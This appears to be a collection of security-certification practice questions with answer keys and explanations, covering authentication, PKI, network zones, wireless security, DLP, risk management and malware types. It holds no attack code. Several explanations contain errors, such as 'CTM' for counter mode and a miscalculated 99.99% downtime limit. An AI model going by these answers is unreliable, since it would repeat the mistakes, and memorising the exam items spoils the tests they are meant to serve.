A and C Counterintelligence includes the identification and analysis of specific adversary tactics, techniques, and procedures (TTP). This information furthers the betterment of understanding adversary approaches that counterintelligence can note for monitoring. Counterintelligence provides information about how to configure and audit active logging systems so that they are most likely to capture evidence of attempted and successful intrusions. A Retrospective Network Analysis (RNA) solution provides the means to record network events at either a packet header or payload level. Strategic intelligence is information that security specialists have gathered through research and provides insights used to inform risk management and security control provisioning.
A user presents a smart card to gain access to a building. Authentication is handled through integration to a Windows server that's acting as a certificate authority on the network. Review the security processes and conclude which are valid when using Kerberos authentication. (Select all that apply.) A. Inputting a correct PIN authorizes the smart card's cryptoprocessor to use its private key to create a Ticket Granting Ticket (TGT) request. B. The smart card generates a one-time use Ticket Granting Service (TGS) session key and certificate. C. The Authentication Server (AS) trusts the user's certificate as it was issued by a local certification authority. D. The Authentication Server (AS) is able to decrypt the request because it has a matching certificate.
A and C Inputting a correct PIN authorizes the smart card's cryptoprocessor to use its private key to create a Ticket Granting Ticket (TGT) request to an Authentication Server (AS). The AS can place trust when the user's certificate is issued by a local or third-party root certification authority. An AS responds with a TGT and Ticket Granting Service (TGS) session key, not the smart card. An AS would be able to decrypt the request because it has a matching public key and trusts the user's smart-card certificate.
Select the options that can be configured by Group Policy Objects (GPOs). (Select all that apply.) A. Registry settings B. Code signing C. Access policies D. Baseline deviation
A and C On a Windows Active Directory network, access policies can be configured via group policy objects (GPOs). GPOs can be used to configure access rights for user/group/role accounts. GPOs can configure registry settings across a range of computers. Code signing is the principal means of proving the authenticity and integrity of code (an executable or a script). A GPO can deploy Code Integrity (CI) policies to check for application publisher digital signatures, but not for signing or creating new digital signatures. Baseline deviation reporting tests the configuration of clients and servers to ensure they are patched, and their configuration settings match the baseline template.
Analyze automation strategies to differentiate between elasticity and scalability. Which scenarios demonstrate scalability? (Select all that apply.) A. A company is hired to provide data processing for 10 additional clients and has a linear increase in costs for the support. B. A company is hired to provide data processing for 10 additional clients and is able to utilize the same servers to complete the tasks without performance reduction. C. A company has a 10% increase in clients and a 5% increase in costs. D. A company has a 10% increase in clients and a 10% decrease in server performance.
A and C Scalability is defined as the costs involved in supplying the service to more users is linear. For example, if the number of users doubles in a scalable system, the costs to maintain the same level of service would also double (or less than double). If costs more than double, the system is less scalable. A company that is hired to provide data processing for ten additional clients and has a linear increase in costs for the support is a scalable system. A company that has a 10% increase in clients and a 5% increase in costs is highly scalable due to the cost increase being less than the client increase. Elasticity refers to a system's ability to handle changes in demand in real time. A company that is hired to provide data processing for 10 additional clients and can utilize the same servers to complete the task is displaying elasticity. A company that has a 10% increase in clients and a 10% decrease in server performance is demonstrating linear elasticity.
Analyze the features of behavioral technologies for authentication, and choose the statements that accurately depict this type of biometric authentication. (Select all that apply.) A. Behavioral technologies are cheap to implement, but have a higher error rate than other technologies. B. Signature recognition is popular within this technology because everyone has a unique signature that is difficult to replicate. C. Obtaining a voice recognition template for behavioral technologies is rather easy and can be obtained quickly. D. Behavior technologies may use typing as a template, which matches the speed and pattern of a user's input of a passphrase.
A and D Behavioral technologies are sometimes classified as "something you do." These technologies often have a lower cost to implement than other types of biometric cryptosystems, but they have a higher error rate. Typing is used as a behavioral technology, and the template is based on the speed and pattern of a user's input of a passphrase. Signature recognition is not based on the actual signature due to it being easy to replicate. Instead, it is based on the process of applying a signature such as stroke, speed, and pressure of the stylus. Obtaining a voice recognition template is not a fast process, and can be difficult. Background noise and other environmental factors can also interfere with authentication.
A contractor has been hired to conduct penetration testing on a company's network. They have decided to try to crack the passwords on a percentage of systems within the company. They plan to annotate the type of data that is on the systems that they can successfully crack to prove the ease of access to data. Evaluate the penetration steps and determine which are being utilized for this task. (Select all that apply.) A. Test security controls B. Bypass security controls C. Verify a threat exists D. Exploit vulnerabilities
A and D Two penetration test steps are being utilized by actively testing security controls and exploiting the vulnerabilities. Identifying weak passwords is actively testing security controls. In addition, exploiting vulnerabilities is being used by proving that a vulnerability is high risk. The list of critical data obtained will prove that the weak passwords can allow access to critical information. Bypassing security controls can be accomplished by going around controls that are already in place to gain access. Verifying that a threat exists would have consisted of using surveillance, social engineering, network scanners, and/or vulnerability assessment tools to identify vulnerabilities.
During a penetration test, an adversary operator sends an encrypted message embedded in an attached image. Analyze the scenario to determine what techniques the operator is relying on to hide the message. (Select all that apply.) A. Security by obscurity B. Integrity C. Prepending D. Confidentiality
A and D When used to conceal information, steganography amounts to "security by obscurity," which is usually deprecated. A message can be encrypted by some mechanism before embedding it in a covertext, providing confidentiality. Steganography technology can also provide integrity or non-repudiation; for example, it can show that something was printed on a particular device at a particular time, which could demonstrate that it was genuine or a fake. A phishing or hoax email can be made more convincing by using prepending. In an offensive sense, prepending means adding text that appears legitimate and to have been generated by the mail system such as "MAILSAFE:PASSED."
Select the appropriate methods for packet capture. (Select all that apply.) A. Wireshark B. Packet analyzer C. Packet injection D. tcpdump
A and D Wireshark and tcpdump are packet sniffers. A sniffer is a tool that captures packets, or frames, moving over a network. Wireshark is an open source graphical packet capture and analysis utility. Wireshark works with most operating systems, where tcpdump is a command line packet capture utility for Linux. A packet analyzer works in conjunction with a sniffer to perform traffic analysis. Protocol analyzers can decode a captured frame to reveal its contents in a readable format, but they do not capture packets. A packet injection involves sending forged or spoofed network traffic by inserting (or injecting) frames into the network stream. Packets are not captured with packet injection.
Compare the characteristics of a rogue Access Point (AP) in wireless networks to determine which statements correctly summarize their attributes. (Select all that apply.) A. An evil twin is a rogue AP, and an attacker can use a Denial of Service (DoS) to disconnect users from the legitimate AP and connect to the evil twin. B. Sometimes referred to as an evil twin, a rogue AP masquerading as a legitimate AP, may have a similar name to a legitimate AP. C. An attacker can set up a rogue AP with something as simple as a smartphone with tethering capabilities. D. A Denial of Service (DoS) will bypass authentication security (enabled on the AP), so it is important to regularly scan for rogue APs on the network.
A, B, and C A rogue AP masquerading as a legitimate one is an evil twin. When users try to reconnect to an AP after being disconnected, user could connect to the evil twin unknowingly. An attacker can also form evil twins, giving the AP a similar name (SSID) to that of the legitimate AP. Users may select this AP by mistake, and enter their credentials, which the attacker will capture. Rogue APs can be setup with something as basic as a smartphone with tethering capabilities. It is vital to periodically survey the site to detect rogue APs. When enabling authentication security on the AP (without the attacker knowing the details of the authentication method), a DoS will not succeed. It is important to scan for rogue APs, but the ease of a DoS is not the reasoning behind the need for regular scans.
Which of the following are appropriate methods of media sanitization? (Select all that apply.) A. Use random data to overwrite data on each location of a hard drive. B. Reset a hard disk to its factory condition utilizing tools provided by the vendor. C. Degauss a hard drive using a machine with a powerful electromagnet. D. Degauss Compact Disks (CDs) using a machine with a powerful electromagnet.
A, B, and C There are several ways to perform media sanitization, defined as decommissioning various media, including hard drives, flash drives, and tape media. Data sanitization can be performed by overwriting old data on each location on the media using either zeroes or a random pattern. Low-level format can be used to reset a disk to its factory condition. Most disk vendors supply tools to reset a disk and is often described as low-level format tools. It will have the same type of effect as disk wiping software. A magnetic disk can be mechanically shredded or degaussed, exposing the disk to a powerful electromagnet. The machine used to perform this action is costly and will render the disk unusable, meaning it cannot be repurposed or resold. Optical media cannot be reformatted. Discs should be destroyed before discarding. Shredders are available for destroying Compact Disks (CDs).
Analyze the features of Microsoft's Information Rights Management (IRM) and choose the scenarios that accurately depict IRM. (Select all that apply.) A. File permissions are assigned based on the roles within a document. B. A document is emailed as an attachment, but cannot be printed by the receiver. C. A document does not allow screen capture in a web browser view. D. An email message cannot be forwarded to another employee.
A, B, and D A benefit of IRM is that file permissions can be assigned for different document roles, such as author, editor, or reviewer. Each role can have specific access such as sending, printing, and editing. Printing and forwarding of documents can be restricted even when the document is sent as a file attachment. This means that just because a document is forwarded it may not have printing capabilities. Printing and forwarding of email messages can be restricted. Microsoft's IRM helps prevent an authorized viewer from copying, pasting, modifying, and printing content for unauthorized use. It does not have the ability to prevent screen captures from occurring when documents are viewed in a browser.
An authoritative server for a zone creates an RRset signed with a Zone Signing Key. Another server requests a secure record exchange and the authoritative server returns the package along with the public key. Evaluate the scenario to determine what the authoritative server is demonstrating in this situation. A. Domain Name System (DNS) B. DNS Security Extension C. DNS Footprinting D. Dynamic Host Configuration Protocol (DHCP)
B A DNS Security Extension (DNSSEC) transaction is being simulated. This consists of the authoritative server for the zone creating a package of resource records (RRset) signed with a private key (Zone Signing Key). When another server requests a secure record exchange, the authoritative server returns the package along with its public key, which can verify the signature. DNS is a system for resolving host names and domain labels to IP addresses. DNS footprinting means obtaining information about a private network by using its DNS server to perform a zone transfer (all of the records in a domain) to a rogue DNS. DHCP provides for an automatic method for network address allocation.
An employee is working on a team to build a directory of systems they are installing in a classroom. The team is using the Lightweight Directory Access Protocol (LDAP) to update the X.500 directory. Utilizing the standards of an X.500 directory, which of the following distinguished names is the employee most likely to recommend? A. OU=Univ,DC=local,CN=user,CN=system1 B. CN=system1,CN=user,OU=Univ,DC=local C. CN=user,DC=local,OU=Univ,CN=system1 D. DC=system1,OU=Univ,CN=user,DC=local
B A distinguished name is a unique identifier for any given resource within an X.500-like directory and made up of attribute=value pairs, separated by commas. The most specific attribute lists first, and then successive attributes become progressively broader. Also referred to as the relative distinguished name, the most specific attribute (in this case, system1) uniquely identifies the object within the context of successive attribute values. The directory schema describes the types of attributes, what information they contain, and the way attributes define object types. Some of the attributes commonly used include Common Name (CN), Organizational Unit (OU), Organization (O), Country (C), and Domain Component (DC). In this scenario, CN=system1 is the Common Name, CN=User is the broader common name, OU=Univ is the Organizational Unit, and DC=local is the Domain Component. This goes in order of a specific system to the broadest Domain Component.
Compare and evaluate the various levels and types of security found within a Trusted OS (TOS) to deduce which scenario is an example of a hardware Root of Trust (RoT). A. A security system is designed to prevent a computer from being hijacked by a malicious operating system B. The boot metrics and operating system files are checked, and signatures verified at logon. C. Digital certificates, keys, and hashed passwords are maintained in hardware-based storage. D. The industry standard program code that is designed to operate the essential components of a system.
B A hardware RoT, or trust anchor, is a secure subsystem that can provide attestation. When a computer joins a network, it may submit a report to the NAC declaring valid OS files. The RoT scans the boot metrics and OS files to verify their signatures. A secure boot is a security system designed to prevent a computer from being hijacked by a malicious OS. A Trusted Platform Module (TPM) is a specification for hardware-based storage of digital certificates, keys, hashed passwords, and other user and platform identification information. The Basic Input/Output System (BIOS) provides an industry standard program code that operates the essential components of the PC and ensures that the design of each manufacturer's motherboard is PC compatible.
There are several types of security zones on a network. Analyze network activities to determine which of the following does NOT represent a security zone. A. DMZ B. Screened host C. Wireless D. Guest network
B A screened host is when a smaller network accesses the Internet using a dual-homed proxy/gateway servers. A Demilitarized Zone (DMZ) is a protected but untrusted area (zone) between the Internet and the private network. Traffic from wireless networks might be less trusted than from a cabled network. If unauthenticated open access points or authenticated guest Wi-Fi networks exist on the network, admin should keep them isolated. A guest network is a zone that allows untrusted or semi-trusted hosts on the local network. Examples include publicly accessible computers or visitors bringing their own portable computing devices to the premises.
Management has reason to believe that someone internal to the organization is committing fraud. To confirm their suspicion, and to collect evidence, they need to set up a system to capture the events taking place. Evaluate which option will best fit the organization's needs. A. Honeynet B. Honeypot C. Exploitation framework D. Metasploit
B A system that is placed on the network with the intent of attracting attackers or to detect internal fraud, snooping and malpractice is called a honeypot. This system will be placed within the current network. An entire decoy network is called a honeynet. A honeynet can be an actual network or simulated. An exploitation framework is a means of running intrusive scanning and uses the vulnerabilities identified by a scanner and launches scripts or software to attempt to exploit selected vulnerabilities. Metasploit is the best-known exploit framework.
A website with many subdomains has been issued a web server certificate for domain validation. This certificate verifies the parent domain and all subdomains (to a single level). This certificate is also known as which of the following? A. SAN certificate B. Wildcard certificate C. Root certificate D. Code signing certificate
B A wildcard certificate with a field entry of a wildcard domain such as *.comptia.org, means that the certificate issued to the parent domain will be accepted as valid for all subdomains (to a single level). A subject alternative name (SAN) certificate list different identifiers including domain names which are specific for each certificate. This becomes a wildcard certificate when a wildcard domain is listed. The root certificate is the one that identifies the certificate authority (CA) itself. The root certificate is self-signed. A root certificate would normally use a key size of at least 2048 bits. A code signing certificate is issued to a software publisher by the CA. The publisher signs the executables or DLLs to guarantee the validity of a software application or browser plug-in.
A systems administrator is building a wireless network using WPA3 technology. Which of the following would NOT be considered a main feature of WPA3? A. Simultaneous authentication of equals B. RC4 stream cipher with TKIP C. Management protection frames D. Enhanced open
B Among several main features of WPA3, Simultaneous Authentication of Equals (SAE) replaces WPA's 4-way handshake authentication and association mechanism with a protocol based on Diffie-Hellman key agreement. Version 1 of WPA uses the RC4 stream cipher but adds a mechanism called the Temporal Key Integrity Protocol (TKIP) to make it stronger. Management protection frames mandates use of these to protect against key recovery attacks. It is one of several different features that make WPA3 a more secure solution for wifi networks. Enhanced Open enables encryption for the open authentication method.
Consider the types of zones within a network's topology and locate the zone considered semi-trusted and requires hosts to authenticate to join. A. Private network B. Extranet C. Internet D. Anonymous
B An extranet zone is a network of semi-trusted hosts, typically representing business partners, suppliers, or customers. Hosts must authenticate to join the extranet. A private network (intranet) is a network of trusted hosts owned and controlled by the organization. This type of trusted host network is under administrative control and subject to the security mechanisms set up to defend the network. Internet, or guest, zones permit anonymous access by untrusted hosts over the Internet. This can also be a mix of anonymous and authenticated access. Anonymous is not a zone but is a part of the Internet or guest zones.
Analyze each scenario and determine which best describes the authentication process in an Identity and Access Management (IAM) system. A. An account is created that identifies a user on the network. B. A user logs into a system using a control access card (CAC) and PIN number. C. An Access Control List (ACL) is updated to allow a new user access to only the databases that are required to perform their job. D. A report is reviewed that shows every successful and unsuccessful login attempt on a server.
B Authentication proves that a subject is who or what it claims to be when it attempts to access the resource. A CAC and pin login are examples of authentication. Creating an account or ID that identifies the user, device, or process on the network defines identification. Authorization determines what rights subjects should have on each resource and enforcing those rights. A company employee may need network access but will likely not need access to every resource, and limiting access limits a company's risk. Accounting tracks authorized usage of a resource or use of rights by a subject and alerting when unauthorized use is detected or attempted. Reports and audit logs account for who and what has been accessing network resources.
Biometric authentication methods have different error rates, with some methods being easier to fool than others. An unauthorized user is unlikely to fool which of the following methods? A. Fingerprint scan B. Retinal scan C. Facial recognition D. Voice recognition
B Biometric authentication based on a retinal scan is the hardest method to fool. Retinal scanning is used to identify the patterns of blood vessels with the eye, whereas an iris scan only uses the surface of the eye. It is possible to obtain a copy of a user's fingerprint and create a mold of it that will fool a fingerprint scanner. Facial recognition suffers from relatively high false acceptance and rejection rates, and as a result is vulnerable to spoofing. Voice recognition is subject to impersonation. It is also sensitive to background noise and other environmental factors which can interfere with authentication.
A system administrator has just entered their credentials to enter a secure server room. As the administrator is entering the door, someone is walking up to the door with their hands full of equipment and appears to be struggling to move items around while searching for their credentials. The system administrator quickly begins to assist by getting items out of the person's hands, and they walk into the room together. This person is not an employee, but someone attempting to gain unauthorized access to the server room. What type of social engineering has occurred? A. Familiarity/liking B. Consensus/social proof C. Authority and intimidation D. Identity fraud
B Consensus/social proof revolves around the belief that without an explicit instruction to behave in a certain way, people will follow social norms. It is typically polite to assist someone with their hands full. Familiarity/Liking is when an attacker uses charisma to persuade others to do as requested. They downplay their requests to make it seem like their request is not out of the ordinary. Authority and Intimidation can be used by an attacker by pretending to be someone senior. The person receiving the request would feel the need to take action quickly and without questioning the attacker. Identity fraud is a specific type of impersonation where the attacker uses specific details (such as personal information) of someone's identity.
Compare and contrast the modes of operation for block ciphers. Which of the following statements is true? A. ECB and CBC modes allow block ciphers to behave like stream ciphers. B. CTM mode allows block ciphers to behave like stream ciphers. C. ECB allows block ciphers to behave like stream ciphers. D. CBC and CTM modes allow block ciphers to behave like stream ciphers.
B Counter Mode (CTM) combines each block with a counter value. This allows each block to be processed individually and in parallel, improving performance. Electronic Code Book (ECB) mode applies the same key to each plaintext block, which means identical plaintext blocks can output identical ciphertexts. This is not how a stream cipher behaves. Counter Mode (CTM) allows block ciphers to behave like stream ciphers, which are faster than block ciphers . Cipher Block Chaining (CBC) mode applies an Initialization Vector (IV) to the first plaintext block to ensure that the key produces a unique ciphertext from any given plaintext and repeating as a "chain." This is not how a stream cipher behaves.
Which statement most accurately describes the mechanisms by which blockchain ensures information integrity and availability? A. Blockchain ensures availability by cryptographically linking blocks of information, and integrity through decentralization. B. Blockchain ensures availability through decentralization, and integrity through cryptographic hashing and timestamping. C. Blockchain ensures availability through cryptographic hashing and timestamping, and integrity through decentralization. D. Blockchain ensures both availability and integrity through decentralization and peer-to-peer (P2P) networking.
B The blockchain ledger is decentralized and distributed across a peer-to-peer (P2P) network to mitigate the risks of a single point of failure or compromise. Each block in a blockchain validates the hash of the previous block, all the way through to the beginning of the chain, ensuring that each historical transaction has not been tampered with. Blockchain is open. It may ensure the integrity and transparency of financial transactions, among other potential applications. Each block typically includes a timestamp of transactions, as well as the data involved in the transactions themselves, helping ensure data integrity. One of the most important characteristics of a blockchain is decentralization. Being distributed across a peer-to-peer (P2P) network ensures availability, but integrity is achieved through cryptographic hashing and timestamping.
A user would like to install an application on a mobile device that is not authorized by the vendor. The user decides the best way to accomplish the install is to perform rooting on the device. Compare methods for obtaining access to conclude which type of device the user has, and what actions the user has taken. A. The user has an iOS device and has used custom firmware to gain access to the administrator account. B. The user has an Android device and has used custom firmware to gain access to the administrator account. C. The user has an iOS device and has booted the device with a patched kernel. D. The user has an Android device and has booted the device with a patched kernel.
B Rooting is a term associated with Android devices. Some vendors provide authorized mechanisms for users to access the root account on their device. For some devices, it is necessary to exploit a vulnerability or use custom firmware. A user who has an iOS device and wants access to the administrator account will perform an action called jailbreaking versus rooting. If the user had an iOS device, and has booted the device with a patched kernel, the term would have been jailbreaking. An Android device is not able to be booted with a patched kernel. Custom firmware or access from the vendor is required to obtain administrator access.
A security team desires to modify event logging for several network devices. One team member suggests using the configuration files from the current logging system with another open format that uses TCP with a secure connection. Which format does the team member suggest? A. Syslog-ng B. Rsyslog C. Syslog D. NXlog
B Rsyslog can work over TCP and use a secure connection. It uses the same configuration file syntax as Syslog. Rsyslog can use more types of filter expressions in its configuration file to customize message handling. Syslog-ng is an update to Syslog that can use TCP secure communications, but it uses a different configuration file syntax than Syslog. Syslog provides an open format, protocol, and server software for logging event messages. A very wide range of host types use Syslog, as well as UDP for communications. NXlog is an open-source log normalization tool. One common use for it is to collect Windows logs, which use an XML-based format and then normalize them to a standard syslog format.
Given knowledge of secure firmware implementation, select the statement that describes the difference between secure boot and measured boot. A. Secure boot requires a unified extensible firmware interface (UEFI) and trusted platform module (TPM), but measured boot requires only a unified extensible firmware interface (UEFI). B. Secure boot provisions certificates for trusted operating systems (OSes) and blocks unauthorized OSes. Measured boot stores and compares hashes of critical boot files to detect the presence of unauthorized processes. C. Secure boot is the process of sending a signed boot log or report to a remote server, while measured boot provisions certificates for trusted operating systems (OSes) and blocks unauthorized OSes. D. Secure boot requires a unified extensible firmware interface (UEFI) but does not require a trusted platform module (TPM). Measured boot is the mechanism by which a system sends signed boot log or report to a remote server.
B Secure boot is about provisioning certificates for trusted operating systems and blocking unauthorized OSes. Measured boot stores and compares hashes of critical boot files to detect unauthorized processes. Secure boot requires UEFI but does not require a TPM. A trusted or measured boot process uses platform configuration registers (PCRs) in the TPM at each stage in the boot process to check whether hashes of key system state data have changed. Attestation is the process of sending a signed boot log or report to a remote server. Secure boot prevents the use of a boot loader or kernel that has been changed by malware (or an OS installed without authorization).
An employee has requested a digital certificate for a user to access the Virtual Private Network (VPN). It is discovered that the certificate is also being used for digitally signing emails. Evaluate the possible extension attributes to determine which should be modified so that the certificate only works for VPN access. A. Valid from/to B. Extended key usage C. Serial number D. Public key
B Set the Extended Key Usage (EKU) field of a certificate to define its usage. Applications such as virtual private network (VPN) or email clients may require specific requirements for key usage configuration. The validity field displays the date and time during which the certificate is valid. Certificates are issued with a limited duration, as set by the certificate authority (CA) policy for the certificate type. The serial number is a number uniquely identifying the certificate within the domain of its CA. This prevents a CA from generating duplicate certificates. The public key field displays the public key and algorithm used by the certificate holder. This key can be shared with other clients and users on the public network.
Transport layer security (TLS) version 1.3 improves upon a vulnerability in TLS1.2. Which statement correctly describes a remedy for this vulnerability? A. TLS version 1.3 is backward compatible with earlier versions of transport layer security. B. TLS version 1.3 removes the ability to downgrade to weaker encryption ciphers and earlier versions of transport layer security. C. TLS version 1.3 creates a secure link between the client and server using Secure Shell (SSH) over TCP port 22. D. TLS1.3 can use more secure authentication and authorization methods, such as security assertion markup language (SAML) and open authorization (OAuth).
B TLS 1.3 removes the ability to perform downgrade attacks by preventing the use of unsecure features and algorithms from previous versions. Configuring a TLS 1.2 server allows clients to downgrade to TLS 1.1 or 1.0 or SSL 3.0 if they do not support TLS 1.2. A man-in-the-middle can use a downgrade attack to try to force the use of a weak cipher suite and secure sockets layer (SSL)/TLS version. Secure shell file transfer protocol (SFTP) addresses the privacy and integrity issues of FTP by encrypting the authentication and data transfer between client and server. The Open Authorization (OAuth) protocol is a standard for federated identity management to consider for secure application programming interfaces (APIs), not a TLS1.3 feature.
A critical server has a high availability requirement of 99.99%. What would be a tolerable downtime based on this requirement? A. 0:53:56 annual downtime B. 0:49:23 annual downtime C. 1:24:19 annual downtime D. 2:48:42 annual downtime
B The Maximum Tolerable Downtime (MTD) metric states the requirement for a particular business function. High availability is usually described as 24x7. For a critical system, availability will be described from 99% to 99.9999%. In this scenario, the requirement is 99.99%, resulting in the maximum downtime of 00:52:09. Since 00:49:23 is less downtime than the maximum requirement, this results in the system meeting the requirement. A downtime of 00:53:56 is more than the maximum annual downtime of 00:52:09. As a result, it is outside of the MTD. A downtime of 01:24:19 is more than the maximum annual downtime of 00:52:09. As a result, it is outside of the MTD. A downtime of 02:48:42 is more than the maximum annual downtime of 00:52:09. As a result, it is outside of the MTD.
An employee is working on a project that contains critical data for the company. In order to meet deadlines, the employee decides to email the document containing the data to their personal email to work on at home. Consider the traits of Data Loss Prevention (DLP) and evaluate the scenario to select the DLP remediation the company should utilize. The email is allowed to send the file and an alert is triggered so that an administrator is aware of the incident. The user should be blocked from sending the email but retain access to it. The user is alerted to the policy violation, and it is logged as an incident. Access is denied to the sender and all other users within the company. The file is encrypted and moved into a quarantine area by the management engine. The original file is quarantined and replaced with one describing the policy violation and how the user can release it again.
B The best solution for the company in this scenario is to block the email from sending the file to the personal email account. This action protects the data and notifies the user of the policy violation. It is likely that user training is needed so that the employee is aware of the policy and the reasons why the policy is in place. If an alert only remediation is used for this scenario the data is in danger of being compromised. A personal email will not provide protection and will be vulnerable to attack. This action is not in the best interest of the company. Quarantine will prohibit employees from accessing the file and will reduce work output. The policy violation was not malicious and the intent was not to harm the company. The tombstone remediation technique is one step further from quarantine and is also not conducive to the workflow of the company. The block technique will still create the alert, notify administrators, and allow for retraining the employee without stopping workflow.
Pilots in an Air Force unit utilize government-issued tablet devices loaded with navigational charts and aviation publications, with all other applications disabled. This illustrates which type of mobile device deployment? A. BYOD B. COBO C. COPE D. CYOD
B The company owns the device and dictates the device's purpose in the corporate owned, business only (COBO) model. Employees own their own devices that meet business configuration standards and run corporate applications in the bring your own device (BYOD) model. Businesses may oversee and audit user-owned devices to some extent, but this model poses significant security challenges. In the corporate owned, personally-enabled (COPE) model, the company chooses, supplies, and owns the device, but authorizes personal use, (subject to acceptable use policies). With choose your own device (CYOD), the company owns and supplies the device, but the employee chooses it.
A company utilizing formal data governance assigns the role of data steward to an employee. Evaluate the roles within data governance and conclude which tasks the employee in this role performs. A. The employee ensures the processing and disclosure of Personally Identifiable Information (PII) complies within legal frameworks. B. The employee ensures data is labeled and identified with appropriate metadata. C. The employee enforces access control, encryption, and recovery measures. D. The employee ensures the data is protected with appropriate controls and determines who should have access.
B The data steward is primarily responsible for data quality. This involves tasks such as ensuring data is labeled and identified with appropriate metadata, and data is collected and stored in a format with values that comply with applicable laws and regulations. A privacy officer is responsible for oversight of any Personally Identifiable Information (PII) assets managed by the company. This includes ensuring that the processing and disclosure of PII comply with legal and regulatory frameworks. The data custodian is responsible for managing the system where data assets are stored. This includes responsibility for enforcing access control, encryption, and recovery measures. The data owner is a senior role with ultimate responsibility for maintaining the confidentiality, integrity, and availability of the information asset. The owner is responsible for labeling the asset and ensuring it is protected with appropriate controls.
A hurricane has affected a company in Florida. What is the first step in the order of restoration? A. Enable and test switch infrastructure B. Enable and test power delivery systems C. Enable and test network security appliances D. Enable and test critical network servers
B The first step in the order of restoration is to enable and test power delivery systems such as grid power, Power Distribution Units (PDUs), and secondary generators. The second step in the order of restoration is to enable and test switch infrastructure, followed by routing appliances and systems. The third step in the order of restoration is to enable and test network security appliances, such as firewalls and proxies. The fourth step in the order of restoration is to enable and test critical network servers, such as directory services. The back-end and middleware will be next, followed by the front-end. The final step is to enable client workstations and devices.
An employee handles key management and has learned that a user has used the same key pair for encrypting documents and digitally signing emails. Prioritize all actions that should be taken and determine the first action that the employee should take. A. Revoke the keys. B. Recover the encrypted data. C. Generate a new key pair. D. Generate a new certificate.
B The first step is to recover any data encrypted with the key so the data can be decrypted. Once the data is recovered, the key can be revoked and an administrator can issue a new key pair. After the data has been recovered, the keys should be revoked. They are compromised and should not be used for any future tasks. After the compromised keys are revoked, the user can be issued new keys. The user requires two sets of keys, one for encrypting messages and the other for digitally signing documents. Certificate generation is used to identify the public part of a key pair as belonging to a subject and will occur after the user's new keys have been generated.
Select the example that provides an accurate simulation of a company engaging in the identifying threats phase of risk management. A. A company develops a list of processes that are necessary for the company to operate. B. A company conducts research to determine which vulnerabilities may be exploited. C. A company conducts penetration testing to search for vulnerabilities. D. A company determines how the company will be affected in the event a vulnerability is exploited.
B The third phase of risk management is identify threats. Threats that may take advantage of, exploit, or accidentally trigger vulnerabilities. Threat refers to the sources or motivations of people and things that could cause loss or damage. The first phase of risk management is to identify mission essential functions. Mitigating risk can involve a large amount of expenditure, so it is important to focus efforts. Part of risk management is to analyze workflows and identify the mission essential functions that could cause the whole business to fail if they are not performed. The second phase of risk management is to identify vulnerabilities for each function or workflow. This includes analyzing systems and assets to discover and list any vulnerabilities or weaknesses to which they may be susceptible. The fourth phase of risk management is to analyze business impacts and the likelihood of a vulnerability being activated as a security incident by a threat and the impact of that incident on critical systems.
A system administrator has configured a security log to record unexpected behavior and review the logs for suspicious activity. Consider various types of audits to determine which type aligns with this activity. A. Permission auditing B. Usage auditing C. Information security audit D. Compliance audit
B Usage auditing refers to configuring the security log to record key indicators and then reviewing the logs for suspicious activity. Behavior recorded by event logs that differs from expected behavior may indicate everything from a minor security infraction to a major incident. The systems administrator puts in place permission auditing to review privileges regularly. This includes monitoring group membership and access control lists for each resource plus identifying and disabling unnecessary accounts. An information security audit measures how the organization's security policy is employed and determines how secure the network or site is that is being audited. A compliance audit reviews a company's policies and procedures and determines if it is in compliance with regulatory guidelines.
Consider the life cycle of an encryption key. Which of the following is NOT a stage in a key's life cycle? A. Storage B. Verification C. Expiration and renewal D. Revocation
B Verification is not a stage in a key's life cycle. It is part of the software development life cycle. The stages are: key generation, certificate generation, storage, revocation, and expiration and renewal. Storage is the stage where a user must take steps to store the private key securely. It is also important to ensure that the private key is not lost or damaged. The expiration and renewal stage addresses that a key pair expires after a certain period. Giving the key a "shelf-life" increases security. Certificates can be renewed with new key material. Revocation is the stage that concerns itself with the event of a private key being compromised; it can be revoked before it expires.
Assess the features and processes within biometric authentication to determine which scenario is accurate. A. A company chooses to use a retinal scanner as it is less intrusive than iris scanners. B. A company uses a fingerprint scanner as it is the most widely used biometric authentication method. C. A company uses a fingerprint scanner as it is more expensive but has a straightforward process. D. A company records information from a sample using a sensor module.
B When considering the various tools used for biometric authentication, Fingerprint recognition is the most widely implemented biometric authentication method. To the contrary, Iris scanning is less intrusive than retinal scanning and matches patterns on the surface of the eye using near-infrared imaging. Contrary to having more costs, the technology required for scanning and recording fingerprints is relatively inexpensive and the process quite straightforward. A sensor module acquires the biometric sample from the target but is not a biometric authentication tool itself.
Which of the following solutions best addresses data availability concerns that may arise with the use of application-aware next-generation firewalls (NGFW) and unified threat management (UTM) solutions? A. Signature-based detection system B. Secure web gateway (SWG) C. Network-based intrusion prevention system (IPS) D. Active or passive test access point (TAP)
B While complex NGFW and UTM solutions provide high confidentiality and integrity, lower throughput reduces availability. One solution to this is to treat security solutions for server traffic differently from that for user traffic. An SWG acts as a content filter, which applies user-focused filtering rules and also conducts threat analysis. A signature-based detection (or pattern-matching) engine is loaded with a database of attack patterns or signatures. If traffic matches a pattern, then the engine generates an incident. Intrusion prevention systems (IPS), positioned like firewalls at borders between network zones, provide an active response to network threats. A TAP is a hardware device inserted into a cable to copy frames for analysis.
A user's PC is infected with a virus that appears to be memory resident and loads anytime it is booted from an external universal serial bus (USB) thumb drive. Examine the following options and determine which describes the infection type. A. Script virus B. Boot virus C. Worm D. Spyware
B With a boot virus, code is written to the disk boot sector or the partition table of a fixed disk or USB media. The code executes as a memory resident process when the OS starts. Script and macro viruses use the programming features available in local scripting engines for the OS and/or browser, such as PowerShell. A computer worm is memory-resident malware that can run without user intervention and replicate over network resources. Spyware is malware that can perform adware-like tracking, but also monitor local application activity, take screenshots, and activate recording devices.
If not managed properly, certificate and key management can represent a critical vulnerability. Assess the following statements about key management and select the true statements. (Select all that apply.) A. If a key used for signing and encryption is compromised, it can be easily destroyed with a new key issued. B. It is exponentially more difficult to ensure the key is not compromised with multiple backups of a private key. C. If a private key, or secret key, is not backed up, the storage system represents a single point of failure. D. A compromised private key that encrypts data is of no concern if the same key signs documents.
B and C A problem with key storage is the difficulty associated with multiple backups of a private key. It is exponentially more difficult to ensure the key is not compromised in this situation. If a key is not backed up, it represents a single point of failure. Key recovery is a process for backing up keys and/or recovering data encrypted with a lost key. If a key is compromised and is used for signing only, it can be destroyed, and a new key issued. A key used for encryption cannot be destroyed so easily. The encrypted data has to be recovered first. If the private key used to both encrypt and sign a document is compromised, both uses of the key are of great security risk and may provide external threats more access to private data.
